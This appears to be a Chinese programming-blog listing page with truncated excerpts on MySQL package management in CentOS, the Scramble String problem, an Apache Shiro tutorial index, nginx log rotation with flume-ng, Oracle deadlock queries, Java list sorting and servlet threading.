    enquiry mysql version in centos linux yum list installed | grep mysql yum -y remove mysql-libs.x86_64 enquiry mysql version in yum repositoryyum list | grep mysql oryum -y list mysql* install mysq
  • Scramble String hcx2013 String
    Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively. Below is one possible representation of s1 = "great":
  • 跟我学Shiro目录贴 jinnianshilongnian 跟我学shiro
    历经三个月左右时间,《跟我学Shiro》系列教程已经完结,暂时没有需要补充的内容,因此生成PDF版供大家下载。最近项目比较紧,没有时间解答一些疑问,暂时无法回复一些问题,很抱歉,不过可以加群(334194438/348194195)一起讨论问题。     ----广告-----------------------------------------------------
  • nginx日志切割并使用flume-ng收集日志 liyonghui160com
         nginx的日志文件没有rotate功能。如果你不处理,日志文件将变得越来越大,还好我们可以写一个nginx日志切割脚本来自动切割日志文件。第一步就是重命名日志文件,不用担心重命名后nginx找不到日志文件而丢失日志。在你未重新打开原名字的日志文件前,nginx还是会向你重命名的文件写日志,linux是靠文件描述符而不是文件名定位文件。第二步向nginx主
  • Oracle死锁解决方法 pda158 oracle
     select p.spid,c.object_name,b.session_id,b.oracle_username,b.os_user_name from v$process p,v$session a, v$locked_object b,all_objects c where p.addr=a.paddr and a.process=b.process and c.object_id=b.
  • java之List排序 shiguanghui list排序
       在Java Collection Framework中定义的List实现有Vector,ArrayList和LinkedList。这些集合提供了对对象组的索引访问。他们提供了元素的添加与删除支持。然而,它们并没有内置的元素排序支持。   你能够使用java.util.Collections类中的sort()方法对List元素进行排序。你既可以给方法传递
  • servlet单例多线程 utopialxw 单例多线程servlet
    转自http://www.cnblogs.com/yjhrem/articles/3160864.html 和   http://blog.chinaunix.net/uid-7374279-id-3687149.html Servlet 单例多线程 Servlet如何处理多个请求访问?Servlet容器默认是采用单实例多线程的方式处理多个请求的:1.当web服务器启动的
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他